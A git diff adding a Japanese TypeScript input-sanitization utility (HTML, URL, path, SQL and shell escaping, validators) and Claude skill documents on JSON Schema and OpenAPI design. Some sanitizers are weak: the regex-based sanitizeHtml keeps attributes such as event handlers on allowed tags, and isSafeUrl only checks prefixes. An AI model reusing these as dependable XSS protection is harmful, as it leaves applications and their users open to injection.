+ * ユーザー入力のサニタイズとバリデーションのためのユーティリティ関数集です。
+ * 各関数は単体で使用でき、プロジェクトに合わせてカスタマイズできます。
+ *
+ * @example
+ * // このファイルをコピーして、プロジェクトのユーティリティに追加
+ * cp templates/sanitization-utils.ts src/utils/sanitization.ts
+ */
+
+// ============================================================
+// 1. HTMLサニタイズ
+// ============================================================
+
+/**
+ * HTMLエスケープ - XSS対策の基本
+ */
+export function escapeHtml(unsafe: string): string {
+  const escapeMap: Record<string, string> = {
+    '&': '&amp;',
+    '<': '&lt;',
+    '>': '&gt;',
+    '"': '&quot;',
+    "'": '&#x27;',
+    '/': '&#x2F;',
+  };
+  return unsafe.replace(/[&<>"'/]/g, (char) => escapeMap[char] || char);
+}
+
+/**
+ * HTML属性値のエスケープ
+ */
+export function escapeHtmlAttribute(value: string): string {
+  return value
+    .replace(/&/g, '&amp;')
+    .replace(/"/g, '&quot;')
+    .replace(/'/g, '&#x27;')
+    .replace(/</g, '&lt;')
+    .replace(/>/g, '&gt;')
+    .replace(/\n/g, '&#x0a;')
+    .replace(/\r/g, '&#x0d;');
+}
+
+/**
+ * HTMLタグを除去（プレーンテキスト抽出）
+ */
+export function stripHtmlTags(html: string): string {
+  return html.replace(/<[^>]*>/g, '');
+}
+
+/**
+ * 許可されたHTMLタグのみ保持
+ */
+export function sanitizeHtml(html: string, allowedTags: string[] = ['b', 'i', 'em', 'strong']): string {
+  const tagPattern = new RegExp(`<(?!/?(?:${allowedTags.join('|')})\\b)[^>]*>`, 'gi');
+  return html.replace(tagPattern, '');
+}
+
+// ============================================================
+// 2. URLサニタイズ
+// ============================================================
+
+/**
+ * URLが安全かチェック（javascript:, data: などを拒否）
+ */
+export function isSafeUrl(url: string): boolean {
+  const lowerUrl = url.toLowerCase().trim();
+  const dangerousProtocols = ['javascript:', 'data:', 'vbscript:', 'file:'];
+  return !dangerousProtocols.some((protocol) => lowerUrl.startsWith(protocol));
+}
+
+/**
+ * 安全なURLを返す（危険なURLは空文字列）
+ */
+export function sanitizeUrl(url: string, fallback = ''): string {
+  if (!isSafeUrl(url)) {
+    return fallback;
+  }
+  return url;
+}
+
+/**
+ * URLパラメータをエンコード
+ */
+export function encodeUrlParam(value: string): string {
+  return encodeURIComponent(value);
+}
+
+/**
+ * URLを検証してパース
+ */
+export function parseUrl(url: string): URL | null {
+  try {
+    const parsed = new URL(url);
+    if (!['http:', 'https:'].includes(parsed.protocol)) {
+      return null;
+    }
+    return parsed;
+  } catch {
+    return null;
+  }
+}
+
+// ============================================================
+// 3. ファイルパスサニタイズ
+// ============================================================
+
+/**
+ * ファイル名をサニタイズ（危険な文字を除去）
+ */
+export function sanitizeFilename(filename: string): string {
+  return filename
+    .replace(/[^a-zA-Z0-9._-]/g, '_') // 英数字、ドット、アンダースコア、ハイフンのみ
+    .replace(/\.{2,}/g, '.') // 連続ドットを単一に
+    .replace(/^\.+|\.+$/g, '') // 先頭・末尾のドット除去
+    .substring(0, 255); // 長さ制限
+}
+
+/**
+ * パストラバーサルをチェック
+ */
+export function hasPathTraversal(path: string): boolean {
+  const normalizedPath = path.replace(/\\/g, '/');
+  return normalizedPath.includes('../') || normalizedPath.includes('..');
+}
+
+/**
+ * 安全なファイルパスを生成
+ */
+export function safePath(baseDir: string, userPath: string): string | null {
+  // Node.js環境でのみ使用可能
+  if (typeof process === 'undefined') {
+    throw new Error('This function requires Node.js environment');
+  }
+
+  const path = require('path');
+  const normalizedBase = path.resolve(baseDir);
+  const sanitizedName = sanitizeFilename(path.basename(userPath));
+  const fullPath = path.join(normalizedBase, sanitizedName);
+
+  // ベースディレクトリ外への移動を検出
+  if (!fullPath.startsWith(normalizedBase + path.sep)) {
+    return null;
+  }
+
+  return fullPath;
+}
+
+// ============================================================
+// 4. 入力バリデーション
+// ============================================================
+
+/**
+ * 文字列の長さを検証
+ */
+export function validateLength(
+  value: string,
+  min: number,
+  max: number
+): { valid: boolean; error?: string } {
+  if (value.length < min) {
+    return { valid: false, error: `最小${min}文字以上必要です` };
+  }
+  if (value.length > max) {
+    return { valid: false, error: `最大${max}文字までです` };
+  }
+  return { valid: true };
+}
+
+/**
+ * メールアドレスを検証
+ */
+export function isValidEmail(email: string): boolean {
+  const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
+  return emailRegex.test(email);
+}
+
+/**
+ * 電話番号を検証（日本形式）
+ */
+export function isValidPhoneNumber(phone: string): boolean {
+  const phoneRegex = /^0\d{9,10}$/;
+  const cleanPhone = phone.replace(/[-\s]/g, '');
+  return phoneRegex.test(cleanPhone);
+}
+
+/**
+ * 英数字のみかチェック
+ */
+export function isAlphanumeric(value: string): boolean {
+  return /^[a-zA-Z0-9]+$/.test(value);
+}
+
+/**
+ * 整数かチェック
+ */
+export function isInteger(value: string): boolean {
+  return /^-?\d+$/.test(value);
+}
+
+// ============================================================
+// 5. SQLインジェクション対策
+// ============================================================
+
+/**
+ * SQL特殊文字をエスケープ（緊急時のみ使用、パラメータ化クエリ推奨）
+ */
+export function escapeSqlString(value: string): string {
+  return value
+    .replace(/\\/g, '\\\\')
+    .replace(/'/g, "\\'")
+    .replace(/"/g, '\\"')
+    .replace(/\x00/g, '\\0')
+    .replace(/\n/g, '\\n')
+    .replace(/\r/g, '\\r')
+    .replace(/\x1a/g, '\\Z');
+}
+
+/**
+ * LIKE句のワイルドカードをエスケープ
+ */
+export function escapeLikePattern(pattern: string): string {
+  return pattern.replace(/[%_\\]/g, '\\$&');
+}
+
+// ============================================================
+// 6. コマンドインジェクション対策
+// ============================================================
+
+/**
+ * シェルメタ文字が含まれているかチェック
+ */
+export function hasShellMetachars(input: string): boolean {
+  const shellMetachars = /[;&|`$(){}[\]<>!\\*?#~\n\r]/;
+  return shellMetachars.test(input);
+}
+
+/**
+ * シェル引数をエスケープ（Unix系）
+ */
+export function escapeShellArg(arg: string): string {
+  // シングルクォートで囲み、内部のシングルクォートをエスケープ
+  return `'${arg.replace(/'/g, "'\\''")}'`;
+}
+
+// ============================================================
+// 7. 汎用サニタイズ関数
+// ============================================================
+
+/**
+ * 制御文字を除去
+ */
+export function removeControlChars(value: string): string {
+  // eslint-disable-next-line no-control-regex
+  return value.replace(/[\x00-\x1F\x7F]/g, '');
+}
+
+/**
+ * Unicode正規化
+ */
+export function normalizeUnicode(value: string): string {
+  return value.normalize('NFC');
+}
+
+/**
+ * 空白文字をトリムして正規化
+ */
+export function normalizeWhitespace(value: string): string {
+  return value.trim().replace(/\s+/g, ' ');
+}
+
+/**
+ * 複合サニタイズ - 一般的なテキスト入力用
+ */
+export function sanitizeTextInput(
+  value: string,
+  options: {
+    maxLength?: number;
+    trimWhitespace?: boolean;
+    removeHtml?: boolean;
+    removeControlChars?: boolean;
+  } = {}
+): string {
+  const {
+    maxLength = 1000,
+    trimWhitespace = true,
+    removeHtml = true,
+    removeControlChars: removeCtrl = true,
+  } = options;
+
+  let result = value;
+
+  if (removeCtrl) {
+    result = removeControlChars(result);
+  }
+
+  if (removeHtml) {
+    result = stripHtmlTags(result);
+  }
+
+  if (trimWhitespace) {
+    result = normalizeWhitespace(result);
+  }
+
+  if (maxLength > 0) {
+    result = result.substring(0, maxLength);
+  }
+
+  return result;
+}
+
+// ============================================================
+// 8. 出力コンテキスト別エンコード
+// ============================================================
+
+/**
+ * コンテキスト別エンコーダー
+ */
+export const encoder = {
+  /** HTMLコンテンツ用 */
+  html: escapeHtml,
+
+  /** HTML属性用 */
+  htmlAttr: escapeHtmlAttribute,
+
+  /** URL用 */
+  url: encodeURIComponent,
+
+  /** JavaScript文字列用 */
+  js: (value: string): string => JSON.stringify(value).slice(1, -1),
+
+  /** CSS用 */
+  css: (value: string): string => {
+    return value.replace(/[^a-zA-Z0-9_-]/g, (char) => {
+      return `\\${char.charCodeAt(0).toString(16)} `;
+    });
+  },
+};
+
+// ============================================================
+// 9. 型ガード
+// ============================================================
+
+/**
+ * 文字列型ガード
+ */
+export function isString(value: unknown): value is string {
+  return typeof value === 'string';
+}
+
+/**
+ * 非空文字列チェック
+ */
+export function isNonEmptyString(value: unknown): value is string {
+  return typeof value === 'string' && value.length > 0;
+}
+
+/**
+ * 安全にunknownから文字列を取得
+ */
+export function safeString(value: unknown, defaultValue = ''): string {
+  if (typeof value === 'string') return value;
+  if (typeof value === 'number') return String(value);
+  return defaultValue;
+}

--- a/.claude/skills/json-schema/SKILL.md
+++ b/.claude/skills/json-schema/SKILL.md
@@ -1,0 +1,290 @@
+---
+name: json-schema
+description: |
+  JSON Schema仕様に基づくスキーマ設計を専門とするスキル。
+  API仕様の定義、OpenAPI連携、バリデーションルールの標準化を通じて、
+  相互運用性の高いデータ構造を設計します。
+
+  専門分野:
+  - JSON Schema: Draft 2020-12準拠、バリデーションキーワード
+  - OpenAPI連携: Swagger/OpenAPI 3.x統合
+  - スキーマ参照: $ref、$defs、外部スキーマ
+  - 高度な機能: conditionals、compositions、formats
+
+  使用タイミング:
+  - OpenAPI/Swagger仕様でAPI定義を行う際
+  - 外部システムとのデータ交換フォーマット定義時
+  - 言語非依存のバリデーションルール定義時
+  - ドキュメント生成のためのスキーマ定義時
+
+  Use proactively when defining OpenAPI specifications,
+  external data exchange formats, or language-agnostic validation rules.
+version: 1.0.0
+---
+
+# JSON Schema
+
+## 概要
+
+このスキルは、JSON Schema仕様に基づくスキーマ設計のベストプラクティスを提供します。
+OpenAPI連携、スキーマの再利用、高度なバリデーションパターンを通じて、
+相互運用性の高いデータ構造を設計します。
+
+**主要な価値**:
+- 言語非依存のスキーマ定義
+- OpenAPI/Swagger連携
+- ドキュメント自動生成の基盤
+- 相互運用性の確保
+
+**対象ユーザー**:
+- スキーマ定義を行うエージェント（@schema-def）
+- API設計者
+- システム間連携を担当するエンジニア
+
+## リソース構造
+
+```
+json-schema/
+├── SKILL.md                                    # 本ファイル
+├── resources/
+│   ├── json-schema-basics.md                  # JSON Schema基礎
+│   ├── openapi-integration.md                 # OpenAPI連携
+│   ├── schema-composition.md                  # スキーマ合成
+│   └── validation-keywords.md                 # バリデーションキーワード
+├── scripts/
+│   └── validate-json-schema.mjs               # スキーマ検証スクリプト
+└── templates/
+    └── api-schema-template.json               # APIスキーマテンプレート
+```
+
+## コマンドリファレンス
+
+### リソース読み取り
+
+```bash
+# JSON Schema基礎
+cat .claude/skills/json-schema/resources/json-schema-basics.md
+
+# OpenAPI連携
+cat .claude/skills/json-schema/resources/openapi-integration.md
+
+# スキーマ合成
+cat .claude/skills/json-schema/resources/schema-composition.md
+
+# バリデーションキーワード
+cat .claude/skills/json-schema/resources/validation-keywords.md
+```
+
+### スクリプト実行
+
+```bash
+# JSON Schemaの検証
+node .claude/skills/json-schema/scripts/validate-json-schema.mjs <schema.json>
+```
+
+### テンプレート参照
+
+```bash
+# APIスキーマテンプレート
+cat .claude/skills/json-schema/templates/api-schema-template.json
+```
+
+## いつ使うか
+
+### シナリオ1: OpenAPI仕様の定義
+**状況**: RESTful APIの仕様をOpenAPI形式で定義する
+
+**適用条件**:
+- [ ] API仕様書を作成する必要がある
+- [ ] Swaggerドキュメントを生成したい
+- [ ] クライアントコードを自動生成したい
+
+**期待される成果**: 完全なOpenAPI仕様書
+
+### シナリオ2: 外部システム連携
+**状況**: 外部システムとのデータ交換フォーマットを定義する
+
+**適用条件**:
+- [ ] 異なる言語/プラットフォーム間でデータをやり取りする
+- [ ] 標準化されたフォーマットが必要
+- [ ] バリデーションルールを共有したい
+
+**期待される成果**: 相互運用可能なJSON Schema
+
+### シナリオ3: 設定ファイルスキーマ
+**状況**: アプリケーションの設定ファイルのスキーマを定義する
+
+**適用条件**:
+- [ ] 設定ファイルのバリデーションが必要
+- [ ] IDEでの補完機能を提供したい
+- [ ] ドキュメントを自動生成したい
+
+**期待される成果**: 設定ファイル用JSON Schema
+
+## 基本概念
+
+### JSON Schemaの構造
+
+```json
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://example.com/schemas/user",
+  "title": "User",
+  "description": "ユーザー情報を表すスキーマ",
+  "type": "object",
+  "properties": {
+    "id": {
+      "type": "string",
+      "format": "uuid",
+      "description": "ユーザーID"
+    },
+    "email": {
+      "type": "string",
+      "format": "email",
+      "description": "メールアドレス"
+    },
+    "name": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 100,
+      "description": "ユーザー名"
+    },
+    "age": {
+      "type": "integer",
+      "minimum": 0,
+      "maximum": 150,
+      "description": "年齢"
+    }
+  },
+  "required": ["id", "email", "name"],
+  "additionalProperties": false
+}
+```
+
+### 型システム
+
+```json
+{
+  "type": "string"   // 文字列
+  "type": "number"   // 数値（浮動小数点）
+  "type": "integer"  // 整数
+  "type": "boolean"  // 真偽値
+  "type": "array"    // 配列
+  "type": "object"   // オブジェクト
+  "type": "null"     // null
+  "type": ["string", "null"]  // 複数の型（Nullable）
+}
+```
+
+### スキーマ参照
+
+```json
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://example.com/schemas/order",
+  "$defs": {
+    "address": {
+      "type": "object",
+      "properties": {
+        "street": { "type": "string" },
+        "city": { "type": "string" },
+        "country": { "type": "string" }
+      },
+      "required": ["street", "city", "country"]
+    }
+  },
+  "type": "object",
+  "properties": {
+    "shippingAddress": { "$ref": "#/$defs/address" },
+    "billingAddress": { "$ref": "#/$defs/address" }
+  }
+}
+```
+
+### スキーマ合成
+
+```json
+{
+  "allOf": [
+    { "$ref": "#/$defs/baseEntity" },
+    { "$ref": "#/$defs/timestamps" },
+    {
+      "properties": {
+        "customField": { "type": "string" }
+      }
+    }
+  ],
+
+  "oneOf": [
+    { "$ref": "#/$defs/creditCard" },
+    { "$ref": "#/$defs/bankTransfer" },
+    { "$ref": "#/$defs/paypal" }
+  ],
+
+  "anyOf": [
+    { "type": "string" },
+    { "type": "number" }
+  ]
+}
+```
+
+### 条件付きスキーマ
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "type": { "enum": ["personal", "business"] },
+    "taxId": { "type": "string" }
+  },
+  "if": {
+    "properties": { "type": { "const": "business" } }
+  },
+  "then": {
+    "required": ["taxId"]
+  },
+  "else": {
+    "properties": { "taxId": false }
+  }
+}
+```
+
+## 判断基準チェックリスト
+
+### スキーマ設計時
+- [ ] $schemaと$idを指定しているか？
+- [ ] titleとdescriptionを記載しているか？
+- [ ] requiredを適切に指定しているか？
+- [ ] additionalPropertiesを考慮しているか？
+
+### 再利用性確保時
+- [ ] 共通の定義を$defsにまとめているか？
+- [ ] 適切な粒度で分割しているか？
+- [ ] 外部参照は相対パスか絶対URIか？
+
+### OpenAPI連携時
+- [ ] componentsセクションに配置しているか？
+- [ ] nullable vs type: ["...", "null"]の選択は適切か？
+- [ ] discriminatorを使用すべきか？
+
+## JSON Schema vs Zod
+
+| 観点 | JSON Schema | Zod |
+|-----|-------------|-----|
+| 言語 | 言語非依存 | TypeScript |
+| 実行時 | バリデーションのみ | バリデーション + 変換 |
+| 型推論 | 外部ツール必要 | 自動 |
+| OpenAPI | ネイティブサポート | zod-to-openapi必要 |
+| ユースケース | API仕様、設定ファイル | TypeScriptアプリ |
+
+## 関連スキル
+
+- `.claude/skills/zod-validation/SKILL.md` - Zodバリデーション
+- `.claude/skills/type-safety-patterns/SKILL.md` - 型安全性パターン
+- `.claude/skills/error-message-design/SKILL.md` - エラーメッセージ設計
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース - JSON Schema設計の基本を網羅 |

--- a/.claude/skills/json-schema/resources/json-schema-basics.md
+++ b/.claude/skills/json-schema/resources/json-schema-basics.md
@@ -1,0 +1,390 @@
+# JSON Schema 基礎
+
+## 概要
+
+JSON Schema（Draft 2020-12）の基本的な構文と使用方法を解説します。
+
+## スキーマのメタデータ
+
+### 必須メタデータ
+
+```json
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://example.com/schemas/user.json"
+}
+```
+
+### オプションメタデータ
+
+```json
+{
+  "title": "User",
+  "description": "システムのユーザーを表すスキーマ",
+  "$comment": "このスキーマはv2.0で更新予定",
+  "examples": [
+    {
+      "id": "123",
+      "name": "山田太郎",
+      "email": "taro@example.com"
+    }
+  ],
+  "default": {},
+  "deprecated": false,
+  "readOnly": false,
+  "writeOnly": false
+}
+```
+
+## 基本型
+
+### 文字列型
+
+```json
+{
+  "type": "string",
+  "minLength": 1,
+  "maxLength": 100,
+  "pattern": "^[a-zA-Z0-9]+$"
+}
+```
+
+### 数値型
+
+```json
+{
+  "type": "number",
+  "minimum": 0,
+  "maximum": 100,
+  "exclusiveMinimum": 0,
+  "exclusiveMaximum": 100,
+  "multipleOf": 0.01
+}
+
+{
+  "type": "integer",
+  "minimum": 1,
+  "maximum": 1000
+}
+```
+
+### 真偽値型
+
+```json
+{
+  "type": "boolean"
+}
+```
+
+### Null型
+
+```json
+{
+  "type": "null"
+}
+```
+
+### 複数型（Nullable）
+
+```json
+{
+  "type": ["string", "null"]
+}
+```
+
+## オブジェクト型
+
+### 基本構造
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "name": { "type": "string" },
+    "age": { "type": "integer" }
+  },
+  "required": ["name"],
+  "additionalProperties": false
+}
+```
+
+### プロパティ制約
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "id": { "type": "string" }
+  },
+  "minProperties": 1,
+  "maxProperties": 10,
+  "propertyNames": {
+    "pattern": "^[a-z][a-zA-Z0-9]*$"
+  }
+}
+```
+
+### パターンプロパティ
+
+```json
+{
+  "type": "object",
+  "patternProperties": {
+    "^S_": { "type": "string" },
+    "^I_": { "type": "integer" }
+  },
+  "additionalProperties": false
+}
+```
+
+### 依存関係
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "creditCard": { "type": "string" },
+    "billingAddress": { "type": "string" }
+  },
+  "dependentRequired": {
+    "creditCard": ["billingAddress"]
+  }
+}
+```
+
+## 配列型
+
+### 基本配列
+
+```json
+{
+  "type": "array",
+  "items": { "type": "string" },
+  "minItems": 1,
+  "maxItems": 10,
+  "uniqueItems": true
+}
+```
+
+### タプル（位置指定）
+
+```json
+{
+  "type": "array",
+  "prefixItems": [
+    { "type": "string", "description": "名前" },
+    { "type": "integer", "description": "年齢" }
+  ],
+  "items": false
+}
+```
+
+### 含有チェック
+
+```json
+{
+  "type": "array",
+  "contains": {
+    "type": "object",
+    "properties": {
+      "type": { "const": "admin" }
+    }
+  },
+  "minContains": 1,
+  "maxContains": 3
+}
+```
+
+## 列挙型
+
+### 基本的なenum
+
+```json
+{
+  "enum": ["pending", "active", "suspended", "deleted"]
+}
+```
+
+### 定数値
+
+```json
+{
+  "const": "fixed-value"
+}
+```
+
+## 文字列フォーマット
+
+### 組み込みフォーマット
+
+```json
+{
+  "date-time": "2024-01-15T10:30:00Z",
+  "date": "2024-01-15",
+  "time": "10:30:00",
+  "duration": "P1D",
+  "email": "user@example.com",
+  "idn-email": "日本語@example.com",
+  "hostname": "example.com",
+  "idn-hostname": "日本語.jp",
+  "ipv4": "192.168.1.1",
+  "ipv6": "2001:db8::1",
+  "uri": "https://example.com/path",
+  "uri-reference": "/path/to/resource",
+  "uri-template": "/users/{id}",
+  "json-pointer": "/foo/bar/0",
+  "regex": "^[a-z]+$",
+  "uuid": "550e8400-e29b-41d4-a716-446655440000"
+}
+
+{
+  "type": "string",
+  "format": "email"
+}
+```
+
+## スキーマ参照（$ref）
+
+### ローカル参照
+
+```json
+{
+  "$defs": {
+    "address": {
+      "type": "object",
+      "properties": {
+        "street": { "type": "string" },
+        "city": { "type": "string" }
+      }
+    }
+  },
+  "type": "object",
+  "properties": {
+    "home": { "$ref": "#/$defs/address" },
+    "work": { "$ref": "#/$defs/address" }
+  }
+}
+```
+
+### 外部参照
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "user": { "$ref": "https://example.com/schemas/user.json" },
+    "address": { "$ref": "./address.json#/$defs/postal" }
+  }
+}
+```
+
+### 動的参照
+
+```json
+{
+  "$dynamicAnchor": "node",
+  "type": "object",
+  "properties": {
+    "value": { "type": "string" },
+    "children": {
+      "type": "array",
+      "items": { "$dynamicRef": "#node" }
+    }
+  }
+}
+```
+
+## アノテーション
+
+### 説明的アノテーション
+
+```json
+{
+  "title": "ユーザー名",
+  "description": "システム内で一意なユーザー識別名",
+  "examples": ["john_doe", "jane_smith"],
+  "default": "anonymous"
+}
+```
+
+### 読み書きアノテーション
+
+```json
+{
+  "id": {
+    "type": "string",
+    "readOnly": true,
+    "description": "システム生成のID（編集不可）"
+  },
+  "password": {
+    "type": "string",
+    "writeOnly": true,
+    "description": "パスワード（レスポンスには含まれない）"
+  }
+}
+```
+
+## 完全な例
+
+```json
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://example.com/schemas/user.json",
+  "title": "User",
+  "description": "ユーザー情報スキーマ",
+  "type": "object",
+  "$defs": {
+    "email": {
+      "type": "string",
+      "format": "email",
+      "maxLength": 254
+    },
+    "timestamp": {
+      "type": "string",
+      "format": "date-time"
+    }
+  },
+  "properties": {
+    "id": {
+      "type": "string",
+      "format": "uuid",
+      "readOnly": true
+    },
+    "email": {
+      "$ref": "#/$defs/email"
+    },
+    "name": {
+      "type": "string",
+      "minLength": 1,
+      "maxLength": 100
+    },
+    "role": {
+      "type": "string",
+      "enum": ["user", "admin", "moderator"],
+      "default": "user"
+    },
+    "tags": {
+      "type": "array",
+      "items": { "type": "string" },
+      "uniqueItems": true,
+      "default": []
+    },
+    "createdAt": {
+      "$ref": "#/$defs/timestamp",
+      "readOnly": true
+    },
+    "updatedAt": {
+      "$ref": "#/$defs/timestamp",
+      "readOnly": true
+    }
+  },
+  "required": ["email", "name"],
+  "additionalProperties": false
+}
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/json-schema/resources/openapi-integration.md
+++ b/.claude/skills/json-schema/resources/openapi-integration.md
@@ -1,0 +1,485 @@
+# OpenAPI連携
+
+## 概要
+
+JSON SchemaとOpenAPI 3.xの統合方法を解説します。
+API仕様の定義、コンポーネントの再利用、差異の理解を網羅します。
+
+## OpenAPIとJSON Schemaの関係
+
+### バージョン対応
+
+| OpenAPI | JSON Schema |
+|---------|-------------|
+| 3.0.x | Draft 5 (Wright) ベース |
+| 3.1.x | Draft 2020-12 完全互換 |
+
+### OpenAPI 3.0での制限
+
+```yaml
+# OpenAPI 3.0でサポートされないJSON Schema機能
+# - $id
+# - $anchor
+# - $dynamicRef
+# - if/then/else
+# - dependentSchemas
+# - prefixItems
+# - contentMediaType/contentEncoding
+```
+
+## OpenAPI 3.1での完全互換
+
+```yaml
+openapi: "3.1.0"
+info:
+  title: User API
+  version: "1.0.0"
+
+components:
+  schemas:
+    User:
+      $schema: "https://json-schema.org/draft/2020-12/schema"
+      type: object
+      properties:
+        id:
+          type: string
+          format: uuid
+        email:
+          type: string
+          format: email
+```
+
+## コンポーネントの定義
+
+### 基本的なスキーマ定義
+
+```yaml
+components:
+  schemas:
+    # 基本エンティティ
+    User:
+      type: object
+      properties:
+        id:
+          type: string
+          format: uuid
+          readOnly: true
+        email:
+          type: string
+          format: email
+        name:
+          type: string
+          minLength: 1
+          maxLength: 100
+        createdAt:
+          type: string
+          format: date-time
+          readOnly: true
+      required:
+        - email
+        - name
+
+    # リスト用ラッパー
+    UserList:
+      type: object
+      properties:
+        items:
+          type: array
+          items:
+            $ref: '#/components/schemas/User'
+        total:
+          type: integer
+          minimum: 0
+        page:
+          type: integer
+          minimum: 1
+        pageSize:
+          type: integer
+          minimum: 1
+          maximum: 100
+      required:
+        - items
+        - total
+        - page
+        - pageSize
+```
+
+### リクエスト/レスポンスの分離
+
+```yaml
+components:
+  schemas:
+    # 作成リクエスト
+    UserCreate:
+      type: object
+      properties:
+        email:
+          type: string
+          format: email
+        name:
+          type: string
+          minLength: 1
+        password:
+          type: string
+          minLength: 8
+          writeOnly: true
+      required:
+        - email
+        - name
+        - password
+
+    # 更新リクエスト（部分更新）
+    UserUpdate:
+      type: object
+      properties:
+        name:
+          type: string
+          minLength: 1
+        email:
+          type: string
+          format: email
+
+    # レスポンス
+    UserResponse:
+      type: object
+      properties:
+        id:
+          type: string
+          format: uuid
+        email:
+          type: string
+        name:
+          type: string
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+      required:
+        - id
+        - email
+        - name
+        - createdAt
+        - updatedAt
+```
+
+## スキーマの再利用
+
+### allOf による継承
+
+```yaml
+components:
+  schemas:
+    # 基本フィールド
+    BaseEntity:
+      type: object
+      properties:
+        id:
+          type: string
+          format: uuid
+          readOnly: true
+        createdAt:
+          type: string
+          format: date-time
+          readOnly: true
+        updatedAt:
+          type: string
+          format: date-time
+          readOnly: true
+      required:
+        - id
+        - createdAt
+        - updatedAt
+
+    # 継承
+    User:
+      allOf:
+        - $ref: '#/components/schemas/BaseEntity'
+        - type: object
+          properties:
+            email:
+              type: string
+              format: email
+            name:
+              type: string
+          required:
+            - email
+            - name
+
+    Product:
+      allOf:
+        - $ref: '#/components/schemas/BaseEntity'
+        - type: object
+          properties:
+            title:
+              type: string
+            price:
+              type: number
+          required:
+            - title
+            - price
+```
+
+### oneOf による多態性
+
+```yaml
+components:
+  schemas:
+    Payment:
+      oneOf:
+        - $ref: '#/components/schemas/CreditCardPayment'
+        - $ref: '#/components/schemas/BankTransferPayment'
+        - $ref: '#/components/schemas/PayPalPayment'
+      discriminator:
+        propertyName: type
+        mapping:
+          credit_card: '#/components/schemas/CreditCardPayment'
+          bank_transfer: '#/components/schemas/BankTransferPayment'
+          paypal: '#/components/schemas/PayPalPayment'
+
+    CreditCardPayment:
+      type: object
+      properties:
+        type:
+          type: string
+          const: credit_card
+        cardNumber:
+          type: string
+          pattern: '^\d{16}$'
+        expiryDate:
+          type: string
+          pattern: '^\d{2}/\d{2}$'
+      required:
+        - type
+        - cardNumber
+        - expiryDate
+
+    BankTransferPayment:
+      type: object
+      properties:
+        type:
+          type: string
+          const: bank_transfer
+        bankCode:
+          type: string
+        accountNumber:
+          type: string
+      required:
+        - type
+        - bankCode
+        - accountNumber
+
+    PayPalPayment:
+      type: object
+      properties:
+        type:
+          type: string
+          const: paypal
+        paypalEmail:
+          type: string
+          format: email
+      required:
+        - type
+        - paypalEmail
+```
+
+## エラーレスポンス
+
+### RFC 7807準拠
+
+```yaml
+components:
+  schemas:
+    ProblemDetails:
+      type: object
+      properties:
+        type:
+          type: string
+          format: uri
+          description: エラータイプのURI
+        title:
+          type: string
+          description: 人間可読なタイトル
+        status:
+          type: integer
+          description: HTTPステータスコード
+        detail:
+          type: string
+          description: 詳細な説明
+        instance:
+          type: string
+          format: uri
+          description: エラー発生のURI
+      required:
+        - type
+        - title
+        - status
+
+    ValidationError:
+      allOf:
+        - $ref: '#/components/schemas/ProblemDetails'
+        - type: object
+          properties:
+            errors:
+              type: array
+              items:
+                type: object
+                properties:
+                  field:
+                    type: string
+                  message:
+                    type: string
+                  code:
+                    type: string
+                required:
+                  - field
+                  - message
+
+  responses:
+    BadRequest:
+      description: 不正なリクエスト
+      content:
+        application/problem+json:
+          schema:
+            $ref: '#/components/schemas/ValidationError'
+
+    NotFound:
+      description: リソースが見つからない
+      content:
+        application/problem+json:
+          schema:
+            $ref: '#/components/schemas/ProblemDetails'
+
+    InternalError:
+      description: サーバーエラー
+      content:
+        application/problem+json:
+          schema:
+            $ref: '#/components/schemas/ProblemDetails'
+```
+
+## パス定義との統合
+
+```yaml
+paths:
+  /users:
+    get:
+      summary: ユーザー一覧取得
+      parameters:
+        - name: page
+          in: query
+          schema:
+            type: integer
+            minimum: 1
+            default: 1
+        - name: pageSize
+          in: query
+          schema:
+            type: integer
+            minimum: 1
+            maximum: 100
+            default: 20
+      responses:
+        '200':
+          description: 成功
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/UserList'
+        '500':
+          $ref: '#/components/responses/InternalError'
+
+    post:
+      summary: ユーザー作成
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: '#/components/schemas/UserCreate'
+      responses:
+        '201':
+          description: 作成成功
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/UserResponse'
+        '400':
+          $ref: '#/components/responses/BadRequest'
+
+  /users/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+
+    get:
+      summary: ユーザー取得
+      responses:
+        '200':
+          description: 成功
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/UserResponse'
+        '404':
+          $ref: '#/components/responses/NotFound'
+
+    patch:
+      summary: ユーザー更新
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: '#/components/schemas/UserUpdate'
+      responses:
+        '200':
+          description: 更新成功
+          content:
+            application/json:
+              schema:
+                $ref: '#/components/schemas/UserResponse'
+        '400':
+          $ref: '#/components/responses/BadRequest'
+        '404':
+          $ref: '#/components/responses/NotFound'
+
+    delete:
+      summary: ユーザー削除
+      responses:
+        '204':
+          description: 削除成功
+        '404':
+          $ref: '#/components/responses/NotFound'
+```
+
+## TypeScriptコード生成
+
+### openapi-typescript
+
+```bash
+npx openapi-typescript openapi.yaml -o types.ts
+```
+
+```typescript
+// 生成されたtypes.tsの使用例
+import type { paths, components } from './types';
+
+type User = components['schemas']['UserResponse'];
+type UserCreate = components['schemas']['UserCreate'];
+
+// APIクライアント用の型
+type GetUsersResponse = paths['/users']['get']['responses']['200']['content']['application/json'];
+type CreateUserRequest = paths['/users']['post']['requestBody']['content']['application/json'];
+```
+
+## 変更履歴
+
